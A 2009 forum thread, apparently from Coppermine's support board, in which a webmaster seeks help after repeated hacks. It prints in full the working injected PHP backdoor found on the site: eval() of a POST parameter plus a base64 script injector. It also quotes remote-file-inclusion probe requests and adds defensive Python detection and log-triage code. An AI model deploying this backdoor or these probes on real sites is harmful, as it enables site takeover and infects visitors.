hacked

Started by ksxj, March 29, 2009, 09:32:08 AM


ksxj

I have tried checking the databases for unknown admin accounts and don't see anything.
I tried to delete all files and copy my backup files back over.
I tried reinstalling from scratch.
But about 5 min to 30 hrs after I open the directory back up to the public it gets hacked again.

Has anyone else had this problem?
Could really use some help!

It messes up my phpBB files, phpMyAdmin files, and Coppermine files.



<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdncyUzQ0N4c09KMGNyaXB0JTIwc3JjJTNEZ3MlMkYwd2UlMkZuZzlnczRoVWglMkVoVWgyNDclMkUyalhUJTJFbmcxT0owOTVDeCUyRmhVaGpxT0owdWVyQ3h5Q3glMkVqc25nJTNFJTNDbmclMkZzY3JqWFRpcGhVaHRncyUzRScpLnJlcGxhY2UoL2hVaHxqWFR8Z3N8c1Z8MHdlfEN4fE9KMHxuZy9nLCIiKSk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
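
An added example, not code from the thread or from the Coppermine project: a small scanner for the kind of injected PHP shown above, keyed on the traits visible in it (eval() of a POST parameter, a long base64 literal, an ob_start() callback that rewrites the page before <body>, and a set_error_handler() hook that fires on every request). The indicator names, the threshold, and both sample files are my own constructions; scan_tree() is meant to be pointed at the whole web root, not only the gallery folder.

```python
import os
import re

# Indicators taken from the shape of the injected PHP above: eval() of a POST
# parameter, a long base64 literal, an ob_start() callback that rewrites the
# page before <body>, and a set_error_handler() hook that runs on every request.
INDICATORS = {
    "eval_of_request_input": re.compile(r"eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b"),
    "base64_decode_literal": re.compile(r"base64_decode\s*\(\s*['\"][A-Za-z0-9+/=]{40,}['\"]"),
    "output_buffer_callback": re.compile(r"ob_start\s*\(\s*['\"]\w+"),
    "error_handler_hook": re.compile(r"set_error_handler\s*\("),
    "body_tag_injection": re.compile(r"preg_replace\s*\([^)]*<body"),
}

def scan_php_source(source: str) -> list[str]:
    """Return the names of the indicators present in one file's contents."""
    return [name for name, rx in INDICATORS.items() if rx.search(source)]

def is_suspicious(source: str, threshold: int = 2) -> bool:
    """Flag a file only when several independent indicators co-occur."""
    return len(scan_php_source(source)) >= threshold

def scan_tree(root: str, threshold: int = 2) -> dict[str, list[str]]:
    """Walk a whole web root (not just the gallery folder) and report hits."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".php", ".inc", ".phtml")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = scan_php_source(fh.read())
                if len(found) >= threshold:
                    hits[path] = found
    return hits

# Constructed samples, not files from the poster's server.
CLEAN_SAMPLE = """<?php
ob_start();                      // buffering without a callback is normal
require_once 'config.php';
echo render_page($config);
"""
# Constructed to mimic the structure of the injected code, not a copy of it.
INFECTED_SAMPLE = """<?php if(!function_exists('x_hook')){
if(isset($_POST['x_cmd']))eval($_POST['x_cmd']);
define('X_PAYLOAD',base64_decode('QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB'));
function x_hook($s){return preg_replace('#(\\s*<body)#mi',X_PAYLOAD.'\\1',$s);}
function x_hook2(){ob_start('x_hook');}}
set_error_handler('x_hook2');x_hook2(); ?>
"""
```

A hit on a single indicator (for example ob_start with a callback in a templating library) is normal; it is the combination that marks a planted file.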



phill104

A link to your site would help.

Are you using the latest versions of all the software you have installed?

Have you done a full scan of your setup and all the files in there?

Have you read the "Yikes, I've been hacked" thread?

http://forum.coppermine-gallery.net/index.php/topic,51927.0.html
It is a mistake to think you can solve any major problems just with potatoes.

ksxj



the site is www.kamojeepclub.org and my personal site www.larsons.info


But I have taken the site down. Trying to fix it. But yes, I did a fresh install with all of the newest versions. It took 5 minutes for it to be hacked. And yes, I read that forum.

Joachim Müller

Just performing a fresh install won't help. As suggested in the Yikes thread, you need to sanitize your entire site. This includes closing all possible backdoors and loopholes. Usually, attackers don't leave an admin account behind inside the database, as that's quite obvious to figure out and to fix. More elegantly, they hide a little script that lets them take over your site again in a file that looks innocent. They usually hide that file outside of the folder that contains the app that let them get in in the first place. It's quite likely that the backdoor they use doesn't reside in your coppermine folder. Therefore, your fresh installs won't accomplish anything good.
I'm sorry, but this is something you can't really expect our help with: as suggested in the Yikes-thread, you're welcome to try to sanitize for yourself. If this doesn't help, ask your webhost for support. If this doesn't help, hire a pro. It's really beyond the scope of free support to clean your hacked site. It's beyond the scope of this site as well to explain to you what hackers do to infest your site - even if we were ready to post such instructions, wannabe script kiddies would benefit more from such instructions than you as site owner (who usually doesn't have any hacking skills, which is understandable and fine).
I can understand that this might sound frustrating for you, but you have to understand that we simply cannot help you more with this.
In the future, please use better subjects for your postings.

ksxj

What do you consider sanitizing my entire site? I deleted every file and folder and started a fresh install from scratch. Then I double-checked that all the permissions on the folders and files were correct. Just got done doing that for the second time yesterday. My site was hacked again sometime today.

phill104

When you say you sanitised the entire site, do you mean every file including phpBB and phpMyAdmin? Have you upgraded those to the latest version too? Have you checked through all the files in your album folders for malicious scripts?

The best bet would be to ask your host to check the server logs. They should be able to see where the scumbags got in and what changes they have made.

ksxj

On either Yahoo or GoDaddy I don't get the choice of version of phpMyAdmin. Plus they both say it will take a court subpoena to get the access log file. I have my access logs set up, but they are not descriptive enough. But yes, I deleted every HTML and PHP file off my server and then reinstalled and double-checked permissions on each file.

Joachim Müller

What do you consider a re-install? Your site looks pretty customized to me - it's not just a vanilla install. At least the forum theme must come from somewhere - from a copy on your hard drive ideally. Can't say anything about your gallery, as you require visitors to log in. The gallery certainly isn't a fresh install either - as you have indexes on (which is a very bad thing in terms of security) I was able to browse your albums folder and spot that there are loads of sub-folders and files. All script kiddies are obviously welcome to browse your page - that's like saying "hackers welcome" at the front door. Did you actually read the Yikes-thread and do as suggested? I don't think so: it looks like you haven't sanitized nor have you re-installed properly - a re-install would mean an empty slate and not a populated gallery and forum. Looks like you re-added the hack by restoring the files or not deleting them in the first place. As suggested in the Yikes-thread: you need to sanitize your site, which is a time-consuming job.

ksxj

What do you mean by "as you have indexes on (which is a very bad thing in terms of security)"?

It is a fresh install. I reinstalled all those add-ins, custom settings and all, and uploaded all new img files while it was still up and running. I stayed up all night to get it done, but I did do it. Now for the albums folder, I didn't realize that. It was not that way the first time I got hacked though. Which brings up why I am posting this. I just want to know how they got in and are continually getting in. Just getting really frustrated and need some assistance.

ksxj

Oh, I consider a fresh install to be where I download the most updated version of code from this site and use my FTP program and tell it to install.

phill104

It is impossible for us to know how they got in. It might have been through coppermine but could be through so many other ways including problems with your hosting. I have seen hosts have an entire server full of users get hacked when they get in through one user which might not be you. You also have other applications on your system that could have allowed the hackers in.

The only way to be sure is to check the logs or ask your host to explain how they got in. If your host is unwilling to do that then maybe you should consider alternative options. By not telling you they are compromising their system so it is in their best interests to help.


Joachim Müller

Indexes being on is not related to coppermine. Please google for it or ask your webhost.

ksxj

So it's happened again!

Found these in my log file. Is this how they are getting in?

"GET /gallery/albums/inc/functions.inc.php?config[ppa_root_path]=http://www.shipdesign.co.kr/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"

"GET /inc/functions.inc.php?config[ppa_root_path]=http://www.shipdesign.co.kr/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"

Found some interesting reading on ppa_root_path:

http://anonymousite.altervista.org/wordpress/2008/09/01/20/

http://www.securityfocus.com/bid/14209/exploit

http://www.geocities.com/hsia_joe/Tutorial.txt

Can someone please help me?


Nibbler

Those are vulnerabilities in other applications.

ksxj

Then why are they using it on my site with your software installed?

"GET /gallery/albums/inc/functions.inc.php?config[ppa_root_path]=http://www.shipdesign.co.kr/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"

"GET /inc/functions.inc.php?config[ppa_root_path]=http://www.shipdesign.co.kr/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"



Nibbler

It's an automatic attack. You don't have that software installed so it fails. That's what the log message is telling you: 404 - file not found.
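
Nibbler's point above, as an added example that is not from the thread or from Coppermine: parse access-log lines in Apache combined format, pull out any query parameter whose value points at a remote URL (the ppa_root_path probes are of that shape), and separate the requests the server answered 404 from any it actually served, which are the ones worth investigating. The client address, timestamps, the remote host, and the third and fourth log lines are placeholder values I constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" log format; the target keeps its query string intact.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)
# A parameter value that is itself a URL is the hallmark of a remote-include probe.
REMOTE_URL = re.compile(r"^(https?|ftp)://", re.I)

def find_rfi_probes(lines):
    """Return one record per request carrying a remote URL in its query string."""
    probes = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                       # skip lines that are not in combined format
        parts = urlsplit(m["target"])
        remote = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)
                  if REMOTE_URL.match(v)]
        if remote:
            probes.append({"ip": m["ip"], "path": parts.path, "status": int(m["status"]),
                           "ua": m["ua"], "params": remote})
    return probes

def triage(probes):
    """Split probes into those the server rejected (404) and those it served (<400)."""
    failed = [p for p in probes if p["status"] == 404]
    served = [p for p in probes if p["status"] < 400]
    return failed, served

# Constructed sample log: the first two lines follow the requests quoted in the
# thread (client address, timestamp and remote host are placeholders), the third
# shows what a probe against a file that does exist would look like, the fourth
# is an ordinary visitor.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Apr/2009:03:12:07 +0000] "GET /gallery/albums/inc/functions.inc.php'
    '?config[ppa_root_path]=http://remote.example/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"',
    '192.0.2.10 - - [01/Apr/2009:03:12:08 +0000] "GET /inc/functions.inc.php'
    '?config[ppa_root_path]=http://remote.example/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"',
    '192.0.2.10 - - [01/Apr/2009:03:12:09 +0000] "GET /old/includes/page.php'
    '?page=http://remote.example/id? HTTP/1.1" 200 5120 "-" "libwww-perl/5.79"',
    '198.51.100.7 - - [01/Apr/2009:03:15:41 +0000] "GET /gallery/thumbnails.php?album=3'
    ' HTTP/1.1" 200 8190 "http://www.example.org/" "Mozilla/5.0"',
]
```

A 404 on such a probe means the targeted script is not on the server at all; a 200 means the script exists and the parameter was accepted, and that path needs to be checked by hand.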

ksxj

Thanks, that makes more sense.


But I still don't understand how they are getting into my site and inserting code! 

Nibbler

Make sure your gallery is up to date and fully sanitised.

ksxj

I know that is your first response, but I have done that multiple times now and it has not fixed the issue.